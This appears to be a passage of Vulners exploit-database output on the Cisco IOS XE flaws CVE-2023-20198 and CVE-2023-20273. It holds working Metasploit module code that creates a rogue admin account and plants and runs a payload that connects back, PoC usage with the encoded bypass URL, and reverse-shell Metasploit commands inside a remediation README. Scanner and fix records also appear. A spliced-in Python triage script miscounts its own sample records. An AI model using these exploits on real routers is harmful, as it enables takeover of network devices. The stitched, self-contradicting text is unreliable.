This option is the maximum\n # number of seconds to keep trying.\n OptInt.new('CISCO_CMD_TIMEOUT', [true, 'The maximum timeout (in seconds) to wait when trying to execute a command.', 30])\n ]\n )\n end\n\n def check\n # First, a get request to the root of the Web UI, this lets us verify the target is a Cisco IOS XE device with\n # the Web UI exposed (which is the vulnerable component).\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri('webui')\n )\n\n return CheckCode::Unknown('Connection failed') unless res\n\n # We look for one of two identifiers to ensure the request to /webui above returns something with Cisco in the content.\n if res.code != 200 || (!res.body.include?('Cisco Systems, Inc.') || !res.headers['Content-Security-Policy']&.include?('cisco.com'))\n return CheckCode::Unknown('Web UI not detected')\n end\n\n # By here we know the target is the IOS XE Web UI. We leverage the vulnerability to pull out the version number,\n # so if this request succeeds, then we known the target is vulnerable.\n res = run_cli_command('show version', Mode::PRIVILEGED_EXEC)\n\n # If the above request failed, then the target is safe.\n return CheckCode::Safe unless res\n\n version = 'Cisco IOS XE Software'\n\n # If we can pull out the version number via a regex, we do. If this fails, the target is still vulnerable\n # (as the above call to run_cli_command succeeded), however maybe this firmware version uses a different format\n # for the version information so our regex wont work.\n # Note: Version numbers can have letters in them, e.g. 
17.11.99SW or 16.12.1z2\n if res =~ /(Cisco IOS XE Software, Version \\S+\\.\\S+\\.\\S+)/\n version = Regexp.last_match(1)\n end\n\n CheckCode::Vulnerable(version)\n end\n\n def exploit\n admin_username = rand_text_alpha(8)\n admin_password = rand_text_alpha(8)\n\n # Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account.\n unless run_cli_command(\"username #{admin_username} privilege 15 secret #{admin_password}\", Mode::GLOBAL_CONFIGURATION)\n fail_with(Failure::UnexpectedReply, 'Failed to create admin user')\n end\n\n begin\n print_status(\"Created privilege 15 user '#{admin_username}' with password '#{admin_password}'\")\n\n # Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload...\n\n # A shell script to execute the Metasploit payload. Will delete itself upon execution.\n bootstrap_script = \"#!/bin/sh\\nrm -f $0\\n#{payload.encoded}\"\n\n # The location of our bootstrap script.\n bootstrap_file = \"/tmp/#{Rex::Text.rand_text_alpha(8)}\"\n\n # NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and\n # 17.8 to work as expected. Version 16.* did not work when semi colons were present in the command line.\n\n # Write a script to disk which will execute the Metasploit payload. 
We base64 encode it to avoid any problems\n # with restricted chars, and leverage openssl to decode and write the contents to disk.\n success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do\n next run_os_command(\"openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}\", admin_username, admin_password)\n end\n\n unless success\n fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file')\n end\n\n # Make the script executable.\n success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do\n next run_os_command(\"chmod +x #{bootstrap_file}\", admin_username, admin_password)\n end\n\n unless success\n fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file')\n end\n\n # Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by\n # default. The VRF allows the executed script to route its network traffic back the framework. The map_chvrf.sh\n # scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply.\n success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do\n next run_os_command(\"/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}\", admin_username, admin_password)\n end\n\n unless success\n fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file')\n end\n ensure\n print_status(\"Removing user '#{admin_username}'\")\n\n # Leverage CVE-2023-20198 to remove the admin account we previously created.\n unless run_cli_command(\"no username #{admin_username}\", Mode::GLOBAL_CONFIGURATION)\n print_warning('Failed to remove user')\n end\n end\n end\n\nend\n",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/cisco_ios_xe_rce.rb",
"vhref": "https://vulners.com/metasploit/MSF:EXPLOIT-LINUX-MISC-CISCO_IOS_XE_RCE-"
},
{
"lastseen": "2024-06-05T17:45:07",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198\nCVE-2023-20198 Checkscript based on: https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/\nIncluding the updated where there is an Authorization header to check for the known implant. \n\n!! Upgraded to look for upgraded implant \n\n\n\nThe script checks length of returned response with code 200, and checks if length is shorter then 32 characters. Each IP returning shorter length than 32 chars should be checked to se if device is compromised. This script *only* gives you an indicator, not proof that the device is compromised.\n\nThe script also checks if the implant has been upgraded, as dicovered by Fox-IT: https://github.com/fox-it/cisco-ios-xe-implant-detection\n\n\nRun:\n\n```\npython cve-2023-20198.py\n\n\nand enter you desired subnet to scan. For example:\n\npython CVE-2023-20198\n\n\nEnter the subnet (CIDR notation): 10.0.0.0/22\n\nIP: 10.0.0.94 - Error: no reply\n\nIP: 10.0.0.94 - Error: no reply\n\nIP: 10.0.0.96 - Status: 200\n\nIP: 10.0.0.96 - Response is a potentially suspicious: \n\n\nIPs with status code 200, suspicious length, should be checked:\n\n['10.0.0.96']\n\nIPs with status code 200, but no IOC:\n\n[]\n```\n",
"modified": "2024-04-01T11:30:40",
"id": "6D32CD31-2C1D-55F0-B50B-6833D29C48AF",
"published": "2023-10-17T08:00:18",
"href": "https://github.com/Atea-Redteam/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/6D32CD31-2C1D-55F0-B50B-6833D29C48AF"
},
{
"lastseen": "2024-06-05T17:44:43",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE 2023-20198\n<img width=\"518\" alt=\"Screenshot 2023-10-23 234005\" src=\"https://github.com/Pushkarup/CVE-2023-20198/assets/148672587/f14ad83f-0758-4cca-8a5b-f851112c2ae4\">\n\n## Introduction\nThe web UI component of Cisco IOS XE Software has a previously undiscovered vulnerability that, when exposed to the internet or untrusted networks, is already being actively exploited, according to Cisco. Due to this vulnerability, a remote, unauthenticated attacker is able to set up an account with privilege level 15 access on a vulnerable system. Afterward, the attacker can take control of the compromised machine using that account.\n\nCVE-2023-20198 is a privilege escalation vulnerability affecting Cisco IOS XE software, receiving the highest possible CVSS score of 10. Successful exploitation of this vulnerability would allow an attacker to create a user account with full administrative privileges.\n\n## Disclaimer: Educational Purpose Only\n\nThis Proof of Concept (PoC) is presented solely for educational and informational purposes. The intent behind sharing this PoC is to demonstrate potential vulnerabilities in a controlled environment. The goal is to promote understanding of cybersecurity concepts and encourage responsible disclosure.\n\n### Important Points:\n- **Ethical Use:** This PoC should only be used in environments and systems where you have explicit authorization. 
Unauthorized access to computer systems is illegal and unethical.\n- **Responsible Disclosure:** If you discover vulnerabilities as a result of this PoC, it is strongly recommended to report them responsibly to the relevant parties, allowing them adequate time to address and mitigate the issues.\n- **No Endorsement:** This PoC and related materials do not endorse or encourage any form of unauthorized access, hacking, or any other illegal activities.\n\nBy accessing and using this PoC, you acknowledge that you are solely responsible for your actions and agree to use this information in compliance with applicable laws and regulations. The author assumes no liability for any misuse or consequences arising from the use of this PoC for any purpose other than education and responsible disclosure.\n\n## Features\n\n- **User Creation:** Demonstrates the creation of a local user account on a target web application.\n- **Implant Installation:** Installs an implant configuration on the target web application.\n- **Web Server Restart:** Restarts the web server on the target to activate the implant.\n- **Implant Status Check:** Checks the status of the implanted code on the target.\n\n## Getting Started\n\n### Prerequisites\n\n- Python 3.x\n- Required Python packages: `requests`, `colorama`\n\n### Installation\n\n1. Clone the repository:\n\n ```bash\n git clone https://github.com/Pushkarup/CVE-2023-20198.git\n cd CVE-2023-20198\n ```\n\n2. Install the required Python packages:\n\n ```bash\n pip install colorama\n pip install requests\n ```\n\n## Usage\n\n\n1. Create a text file containing the target sites (one per line) and save it with a `.txt` extension.\n \u2022Collect site list for test using dork `labels='cisco-xe-webui'`\n\n2. Edit the Variable config_content in line 121 according to your need . 
Below is a sample config\n ```python\n config_content = \"\"\"\n #This is a sample configuration content\n param1: value1\n param2: value2\n nested_params:\n nested_param1: nested_value1\n nested_param2: nested_value2\n \"\"\"\n ```\n\n3. Run the script:\n\n ```bash\n python main.py\n ```\n\n4. Follow the prompts to process the target sites.\n\n## Contributing\n\nContributions are welcome! If you find any issues or have improvements, feel free to open a pull request or create an issue.\n\n## License\n\nThis project is licensed under the [MIT License](LICENSE).\n\n\n## Contact\n\n- GitHub: [Pushkar Upadhyay](https://github.com/Pushkarup)\n- LinkedIn: [Pushkar Upadhyay](www.linkedin.com/in/pushkar-upadhyay-24p)\n\n## Donations\n### Show your support\n- BTC: 3QqVBBzDBezA9U77PCTwMPQVGb1eecv2SP\n- ETH: 0xB779767483831BD98327A449C78FfccE2cc6df0a\n- USDT: 0xB779767483831BD98327A449C78FfccE2cc6df0a\n",
"modified": "2024-02-12T20:11:46",
"id": "AA1E22FF-1D43-5A38-ABAB-A17B2738EF68",
"published": "2023-10-23T16:04:23",
"href": "https://github.com/Pushkarup/CVE-2023-20198",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/AA1E22FF-1D43-5A38-ABAB-A17B2738EF68"
},
{
"lastseen": "2024-08-10T13:39:33",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"description": "\n# Cisco IOS XE Device Scanner User Guide for CVE-2023-20198-Scanner\n\nThis is a webshell fingerprinting scanner designed to identify implants on Cisco IOS XE WebUI's affected by CVE-2023-20198 and CVE-2023-20273. This Python script checks for compromised Cisco IOS XE devices by making HTTP and HTTPS requests. It supports multiple ways to specify target IPs and provides threading for faster scanning.\n\n## ChangeLog\n- Added new Authentication NGINX Configuration file from [Talos Security's blog](https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/)\n- Added [Explainer for configuration LUA script functionality](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/Exploitation_Explainer.md).\n- Added CURL from Talos Blog along with Authorization HEX value provided by Talos Security.\n\n\nA few things you can do with this scipt:\n\n- [Scan a Single IP](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--ip)\n- [Scan a list of IP's (Provide a file with each IP on a new line and pass it via argument)](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--target_file)\n- [Scan a CIDR range](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--cidr)\n- [Specify a custom UserAgent](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--user_agent)\n- Specify new IOC's within the response.text using a file (IOCS.txt is the default file. Ensure each IOC is on a new line.) *Known IOCS will be updated regularly should new ones become known. 
All current IOC's are already implemented directly into the code for clarity.\n- [Ability to specify a proxy for scans](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--proxy)\n- Concurrent Processing for speed and efficiency.\n- [Rate Limiting](https://github.com/Shadow0ps/CVE-2023-20198-Scanner/blob/main/README.md#--rate_limit)\n- Logging of compromised hosts.\n- Visual indication of potentially compromised hosts vs \"clean\" hosts. - This is not a guarantee and is based strictly off the known IOC's.\n\n## Requirements\n\n- Python 3.x\n- Required Python packages: `requests`, `termcolor`, `tqdm`\n\nInstall the required Python packages using pip if you haven't already:\n\n```bash\npip install requests termcolor tqdm\n```\n\n## Usage\n\nThe script provides several command-line options for flexibility:\n\n### `--target_file`\n\nSpecify a file containing a list of Cisco IOS XE Device IPs or hostnames. The IPs or hostnames should be listed one per line.\n\nExample:\n\n```bash\npython iosxe-scanner.py --target_file targets.txt\n```\n\n### `--cidr`\n\nSpecify a CIDR range to scan. The script will generate all the IPs in the specified range and scan them.\n\nExample:\n\n```bash\npython iosxe-scanner.py --cidr 192.168.1.0/24\n```\n\n### `--ip`\n\nSpecify a single IP to scan.\n\nExample:\n\n```bash\npython iosxe-scanner.py --ip 192.168.1.1\n```\n\n### `--user_agent`\n\nSet a custom User-Agent header for the HTTP requests. The default is `CISCO-IOS-Shell-Scanner-cisco-sa-iosxe-webui-privesc-j22SaA4z`.\n\nExample:\n\n```bash\npython iosxe-scanner.py --user_agent \"MyCustomUserAgent\"\n```\n\n### `--rate_limit`\n\nSet a rate limit in seconds between requests. 
The default is 1 second.\n\nExample:\n\n```bash\npython iosxe-scanner.py --rate_limit 0.5\n```\n\n### `--proxy`\n\nSpecify an HTTP Proxy to use for requests.\n\nExample:\n\n```bash\npython iosxe-scanner.py --proxy http://127.0.0.1:8080\n```\n\n### `--iocs_file`\n\nSpecify a file containing Indicators of Compromise (IoCs) to look for in the response text. The default is `IOCS.txt`.\n\nExample:\n\n```bash\npython iosxe-scanner.py --iocs_file custom_iocs.txt\n```\n\n## Examples\n\n### Scan a list of targets from a file with a rate limit of 0.5 seconds\n\n```bash\npython iosxe-scanner.py --target_file targets.txt --rate_limit 0.5\n```\n\n### Scan a CIDR range using a proxy\n\n```bash\npython iosxe-scanner.py --cidr 192.168.1.0/24 --proxy http://127.0.0.1:8080\n```\n\n### Scan a single IP with a custom User-Agent\n\n```bash\npython iosxe-scanner.py --ip 192.168.1.1 --user_agent \"MyCustomUserAgent\"\n```\n\n### Scan using a custom IoCs file\n\n```bash\npython iosxe-scanner.py --iocs_file custom_iocs.txt\n```\n\n## Notes\n\n- This script disables SSL certificate verification for making HTTPS requests. Use this feature cautiously.\n- This script is presented \"As Is\" with NO WARRANTY. USE AT YOUR OWN RISK!\n- Use of this script may be illegal in your country or jurisdiction. While it only makes simple HTTP(S) requests and checks for specific responses it's up to you to determine whether or not its use is legal/ethical and appropriate. DONT BE A JERK.\n\nIf you find this script useful feel free to let me know or give me a follow on Twitter(\ud835\udd4f) <https://twitter.com/shadow0pz>\n",
"modified": "2024-02-05T20:58:16",
"id": "CB42FC0F-D167-5773-B706-F71EE1103B8A",
"published": "2023-10-23T19:25:29",
"href": "https://github.com/Shadow0ps/CVE-2023-20198-Scanner",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/CB42FC0F-D167-5773-B706-F71EE1103B8A"
},
{
"lastseen": "2024-06-05T17:42:26",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198-\n\n\nCVE-2023-20198 / 0day - Cisco - Authentication Bypass/RCE\n\n![Screenshot 2023-12-14 013414](https://github.com/codeb0ss/CVE-2023-20198-PoC/assets/135759201/084a2160-318d-4fb6-8048-4e198b494802)\n",
"modified": "2023-12-14T20:23:00",
"id": "351C2762-84D8-562F-877D-B2A6D797418F",
"published": "2023-12-13T22:45:25",
"href": "https://github.com/codeb0ss/CVE-2023-20198-PoC",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/351C2762-84D8-562F-877D-B2A6D797418F"
},
{
"lastseen": "2024-06-05T17:42:37",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198"
],
"description": "# CVE-2023-20198-Fix\n\nThis repository contains an Ansible playbook for remediating the CVE-2023-20198 vulnerability found in certain Cisco devices.\n\nIt does the following:\n1. Checks if the web service is running on the router by checking for the associated commands in the running config\n2. Disables the web service if running\n3. Saves the configuration if changed\n4. Checks the logs for signs of previous exploitation\n\n---\n\n## Directory Structure:\n``` bash\nCVE-2023-20198-Fix/\n\u2502\n\u251c\u2500\u2500 ansible.cfg # Ansible configuration file\n\u251c\u2500\u2500 group_vars/ # Directory for variables specific to groups of hosts\n\u2502 \u2514\u2500\u2500 iosxe_devices.yml # Variable definitions for IOS-XE devices\n\u251c\u2500\u2500 inventory.yml # Inventory of hosts, including devices to target\n\u2514\u2500\u2500 remediate.yml # Playbook for remediating CVE-2023-20198\n```\n\n## Getting Started\n### Prerequisites\nEnsure you have Ansible installed on your control machine. This playbook was written for Ansible 2.9 or newer.\n\n### Setup\nConfigure Ansible:\nEdit ansible.cfg to match your environment settings.\n\n### Inventory:\nUpdate inventory.yml with the host details of your IOS-XE devices. \n\n### Variables:\nDefine any necessary variables in group_vars/iosxe_devices.yml. This should include any common settings for your IOS-XE devices, such as connection settings and credentials.\n\n### Adding Hosts to Inventory\nTo add a new IOS-XE device to the inventory, edit the inventory.yml file and append the new host under the appropriate group:\n\n```yaml\niosxe_devices:\n hosts:\n vulnerable_router01:\n ansible_host: 192.168.1.3\n # ... 
other necessary variables\n```\n\nReplace new_router01 with your device's hostname and the ansible_* variables with the actual values for your device.\n\n### Updating Group Variables\nIf you need to update credentials or other settings for the group of IOS-XE devices, edit the group_vars/iosxe_devices.yml file:\n\n```yaml\n---\nansible_network_os: ios\nansible_connection: network_cli\nansible_user: admin\nansible_password: admin_password # Lab use only, store credentials responsibly!\nansible_become_method: enable\nansible_become_password: admin_password # Lab use only, store credentials responsibly!\n# ... other variables\n```\n\n\n## Running the Playbook\nTo execute the playbook, use the following command:\n\n```bash\nansible-playbook remediate.yml -i inventory.yml\n```\n\n\n---\n\n## Metasploit verification\n\n### MSF6 Commands\n\n``` bash\nuse exploit/linux/misc/cisco_ios_xe_rce\nset RHOST 192.168.10.242 # Your target IP\nset target 1\nset payload cmd/unix/python/meterpreter/reverse_tcp\ncheck\nexploit\n```\n\n### Pre Remediation check\n\n![Before](/docs/kali_0.PNG)\n\n### Playbook Run\n \n![run](/docs/ansible-playbook_run.PNG)\n\n### Post Remediation check\n\n![Before](/docs/kali_1.PNG)\n\n\n## Testing\nAlways test your changes in a controlled environment before running the playbook in production.\n\n## Security\nStore sensitive data such as passwords and secret keys using Ansible Vault. Do not store plaintext credentials in your inventory or group_vars files.\n\nFor additional security measures and best practices, consult [Ansible's official documentation](https://docs.ansible.com/ansible/latest/index.html).\n\nPlease replace all placeholder values with actual data that corresponds to your environment. This README assumes a basic familiarity with Ansible concepts such as inventory, variables, and running playbooks.",
"modified": "2023-12-08T21:12:00",
"id": "627B1D7A-4832-549F-95BF-B8720698BC95",
"published": "2023-12-08T21:12:00",
"href": "https://github.com/netbell/CVE-2023-20198-Fix",
"type": "githubexploit",
"title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
"cvss": {
"score": 10.0,
"severity": "CRITICAL",
"vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"vhref": "https://vulners.com/githubexploit/627B1D7A-4832-549F-95BF-B8720698BC95"
}
]
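Turning the records above into something a responder can act on, as an added example (this script is not part of the Vulners documentation or SDK): it rolls the exploit records up per CVE and answers the questions that matter for prioritisation, whether a weaponised framework module exists, which `githubexploit` entries are really scanners or remediation playbooks rather than exploits, and the highest CVSS seen. Note that every GitHub record on this page carries the same generic `title`, so the `description` is the only field that distinguishes a scanner from a PoC; the keyword heuristic and the list of "weaponised" record types are this example's own choices. The `SAMPLE_JSON` input is a constructed, trimmed copy of the records shown, and the `data.search[]._source` envelope accepted by `load_records` is an assumed shape for the raw endpoint, not taken from this page.

```python
"""Triage helper for exploit records returned by the Vulners search API.

Added example, not part of the Vulners documentation or SDK. It rolls the
records shown above up per CVE: whether a weaponised framework module
exists, which GitHub repositories are really scanners or remediation
playbooks rather than exploits, and the highest CVSS score seen.
"""
from __future__ import annotations

import json
import re
from collections import defaultdict
from typing import Any

# Constructed sample input: trimmed copies of the records shown on this page.
SAMPLE_JSON = json.dumps([
    {"id": "MSF:EXPLOIT-LINUX-MISC-CISCO_IOS_XE_RCE-", "type": "metasploit",
     "bulletinFamily": "exploit", "title": "Cisco IOX XE Unauthenticated RCE Chain",
     "description": "This module leverages both CVE-2023-20198 and CVE-2023-20273.",
     "cvelist": ["CVE-2023-20198", "CVE-2023-20273"],
     "published": "2023-11-06T17:12:40", "cvss": {"score": 10.0, "severity": "CRITICAL"}},
    {"id": "6D32CD31-2C1D-55F0-B50B-6833D29C48AF", "type": "githubexploit",
     "bulletinFamily": "exploit", "title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
     "description": "# CVE-2023-20198\nCVE-2023-20198 Checkscript based on the Talos blog.",
     "cvelist": ["CVE-2023-20198"],
     "published": "2023-10-17T08:00:18", "cvss": {"score": 10.0, "severity": "CRITICAL"}},
    {"id": "CB42FC0F-D167-5773-B706-F71EE1103B8A", "type": "githubexploit",
     "bulletinFamily": "exploit", "title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
     "description": "# Cisco IOS XE Device Scanner User Guide\nThis is a webshell fingerprinting scanner.",
     "cvelist": ["CVE-2023-20198", "CVE-2023-20273"],
     "published": "2023-10-23T19:25:29", "cvss": {"score": 10.0, "severity": "CRITICAL"}},
    {"id": "627B1D7A-4832-549F-95BF-B8720698BC95", "type": "githubexploit",
     "bulletinFamily": "exploit", "title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
     "description": "# CVE-2023-20198-Fix\nAnsible playbook for remediating CVE-2023-20198.",
     "cvelist": ["CVE-2023-20198"],
     "published": "2023-12-08T21:12:00", "cvss": {"score": 10.0, "severity": "CRITICAL"}},
    {"id": "943D5962-14B3-5410-8106-BD5EEA778153", "type": "githubexploit",
     "bulletinFamily": "exploit", "title": "Exploit for Unprotected Alternate Channel in Cisco Ios Xe",
     "description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198",
     "cvelist": ["CVE-2023-20198", "CVE-2023-20273"],
     "published": "2023-11-16T16:39:38", "cvss": {"score": 10.0, "severity": "CRITICAL"}},
])

# Heuristic (this example's own choice): words in a GitHub README that mark a
# detection or remediation tool. The Vulners title of every githubexploit
# record above is the same generic string, so the description is the signal.
_NOT_EXPLOIT = re.compile(r"\b(scanner|checkscript|detect\w*|remediat\w*|playbook|fix)\b", re.I)
_POC = re.compile(r"\b(poc|proof of concept|exploit)\b", re.I)
# Record types treated as weaponised (example's assumption about Vulners types).
_WEAPONISED_TYPES = {"metasploit", "exploitdb", "packetstorm", "canvas"}


def load_records(raw: str) -> list[dict[str, Any]]:
    """Parse the flat list shown on this page, or (assumed shape) the raw
    endpoint envelope {"data": {"search": [{"_source": {...}}, ...]}}."""
    body = json.loads(raw)
    if isinstance(body, dict):
        hits = body.get("data", {}).get("search", [])
        return [h.get("_source", h) for h in hits]
    return list(body)


def classify(record: dict[str, Any]) -> str:
    """'weaponised' for framework modules; GitHub repos become 'detection'
    or 'poc' from their description, 'unknown' if neither pattern matches."""
    if record.get("type", "") in _WEAPONISED_TYPES:
        return "weaponised"
    text = record.get("description", "")
    if _NOT_EXPLOIT.search(text):  # checked first: scanners also say "exploit"
        return "detection"
    return "poc" if _POC.search(text) else "unknown"


def summarize(records: list[dict[str, Any]]) -> dict[str, dict[str, Any]]:
    """Per-CVE roll-up: record count, kinds seen, weaponised flag, highest
    CVSS score, earliest publication date and the contributing record ids."""
    out: dict[str, dict[str, Any]] = defaultdict(lambda: {
        "count": 0, "kinds": set(), "has_weaponised": False,
        "max_cvss": 0.0, "first_seen": None, "ids": []})
    for rec in records:
        if rec.get("bulletinFamily") != "exploit":
            continue  # skip advisories or CVE entries mixed into the result
        kind = classify(rec)
        score = float((rec.get("cvss") or {}).get("score") or 0.0)
        published = rec.get("published")  # ISO-8601, so string order is chronological
        for cve in rec.get("cvelist", []):
            e = out[cve]
            e["count"] += 1
            e["kinds"].add(kind)
            e["has_weaponised"] |= kind == "weaponised"
            e["max_cvss"] = max(e["max_cvss"], score)
            if published and (e["first_seen"] is None or published < e["first_seen"]):
                e["first_seen"] = published
            e["ids"].append((rec.get("id"), kind))
    return dict(out)


if __name__ == "__main__":
    for cve, e in sorted(summarize(load_records(SAMPLE_JSON)).items()):
        print(f"{cve}: {e['count']} records, kinds={sorted(e['kinds'])}, "
              f"weaponised={e['has_weaponised']}, first_seen={e['first_seen']}")
```

Run against the sample, the script reports both CVEs as weaponised (the Metasploit chain covers both), with three of the five GitHub-sourced records classified as detection or remediation tooling rather than exploits. Feed it the real `find_all` output or the raw endpoint body instead of `SAMPLE_JSON` to triage a live result set.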
Query output for CVE (vulnerability):
[
{
"lastseen": "2024-09-12T13:39:16",
"bulletinFamily": "exploit",
"cvelist": [
"CVE-2023-20198",
"CVE-2023-20273"
],
"description": "# CVE-2023-20198\nExploit PoC for CVE-2023-20198\n\n## Description\nCVE-2023-20198 is characterized by improper path validation to bypass Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>\nBy bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 privileges.<br>\nCisco's investigation into active exploitation of the previously undisclosed vulnerability revealed threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user to facilitate implantation.<br> \n\nThis PoC exploits CVE-2023-20198 to leverage two different XML SOAP endpoints:<br>\nThe vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint to insert commands into the `execCLI` element tag.<br>\nThe add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but thats outside the scope of this PoC.<br>\n\nAbuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template<br>\nAbuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC<br>\n\nNote: I did not conduct any of the original research or PoC development for this CVE. 
See the references section for credit.\n\n## Usage\n```\nusage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]\n\nCVE-2023-20198 Exploit PoC\n\noptions:\n -h, --help show this help message and exit\n -t targetIP Target IP Address\n -l targetFile File containing IP Addresses (-c only)\n -https Use https\n -c [X] Check for vulnerability\n -g [X] Get Cisco IOS running config\n -e command [X] Execute Cisco IOS command\n -a [X] Add new priv 15 user\n -d [X] Remove priv 15 user\n -u newUserName [Optional] user name for -a or -d. Default: shellsmoke\n -p newUserPass [Optional] new user pass for -a. Default: pwned\n -o outputFile Write output to file\n -v Increase verbosity\n```\n\n### Vulnerability check\nTo check for CVE-2023-20198, `-c` will attempt to exploit the vulnerability to execute `uname -a`<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -c\n\nTesting for vulnerability\nTarget IP: 10.0.0.1\nTarget URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\nVulnerable: True\nIOS Ver: <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)\n```\n\n### Get Cisco Config\nThe `-g` option executes `sh run` to pull the running config<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -g\n\nBuilding configuration...\nCurrent configuration : 6988 bytes\n!\n...\n!\nversion 16.6\nno service pad\nservice timestamps debug datetime msec\nservice timestamps log datetime msec\n...\n```\n\n### Execute commands\nArbitrary Cisco IOS commands can be executed with the `-e` option.<br>\nExtreme caution should be used when using this to make configuration changes. 
There is no input validation and changes are applied immediately to the running config.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -e 'sh log'\n\nSelected Target: 10.0.0.1\nRunning in Exec Mode\nExecuting Command: sh log\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nSyslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)\nNo Active Message Discriminator.\nNo Inactive Message Discriminator.\n Console logging: level debugging, 5368 messages logged, xml disabled,\n filtering disabled\n...\n```\n\n### Add user\nThe `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>\nExample:\n```\n# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned\n\nSelected Target: 10.0.0.1\nAdding New Privilege 15 User\nNew User Name: shellsmoke\nNew User Pass: pwned\n\nSending exploit to target URL: http://10.0.0.1/%2577eb%2575i_%2577sma_Http\n\nNo reportable output from adding users\nCheck verbose ouput or get running config\nDone.\n```\n\n### Del user\nThe `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>\nCaution should be used to make sure you aren't deleting a legitimate account.<br>\nThis was added for instances where shell/webui access to an exploited Cisco can not be obtained. 
